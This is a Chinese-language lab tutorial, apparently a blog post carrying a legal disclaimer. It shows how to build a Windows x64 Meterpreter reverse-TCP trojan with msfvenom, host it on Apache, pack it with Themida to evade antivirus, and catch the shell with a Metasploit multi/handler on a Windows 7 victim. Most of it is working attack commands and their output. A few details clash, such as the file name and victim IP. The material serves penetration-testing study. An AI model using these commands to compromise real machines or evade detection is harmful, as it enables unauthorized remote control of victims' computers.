本文章仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。
环境准备:
名称 | 系统 | 位数 | IP |
攻击机 | Kali Linux | 64 | 10.3.0.231 |
客户端 | Windows 7 | 64 | 10.3.0.234 |
一、生成木马
1、在Kali机器上面生成木马,注意这里是64位的木马
msfvenom -p windows/x64/meterpreter/reverse_tcp -b '\x00\x0b' -f exe lhost=10.3.0.231 lport=9999 -o /var/www/html/shellx64.exe
2、启动Apache,方便客户端下载
service apache2 start
3、免杀加壳:本例用的是 Themida
二、Kali 开启监听
1、开启MSF
┌──(root㉿Kali)-[~]
└─# msfconsole
2、使用监听模块
msf6 > use exploit/multi/handler# 输出
[*] Using configured payload generic/shell_reverse_tcp
2、设置Payload
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp# 输出
payload => windows/x64/meterpreter/reverse_tcp
3、设置监听IP
msf6 exploit(multi/handler) > set lhost 10.3.0.231# 输出
lhost => 10.3.0.231
4、设置监听端口
msf6 exploit(multi/handler) > set lport 9999# 输出
lport => 9999
5、运行
msf6 exploit(multi/handler) > run# 输出
[*] Started reverse TCP handler on 10.3.0.231:9999
三、客户端运行
1、模拟下载木马
http://10.3.0.231/shell.exe
2、点击运行木马
四、获取权限
1、当出现 meterpreter,表示成功入侵
msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 10.3.0.231:9999
[*] Sending stage (175686 bytes) to 10.3.0.227
[*] Meterpreter session 1 opened (10.3.0.231:9999 -> 10.3.0.227:58484) at 2024-03-13 14:02:01 +0800meterpreter >
2、查看权限,当客户机是普通用户登录的话,此时获取到的就是一个普通 user 权限
meterpreter > getuid# 输出
Server username: tomma-PC\tomma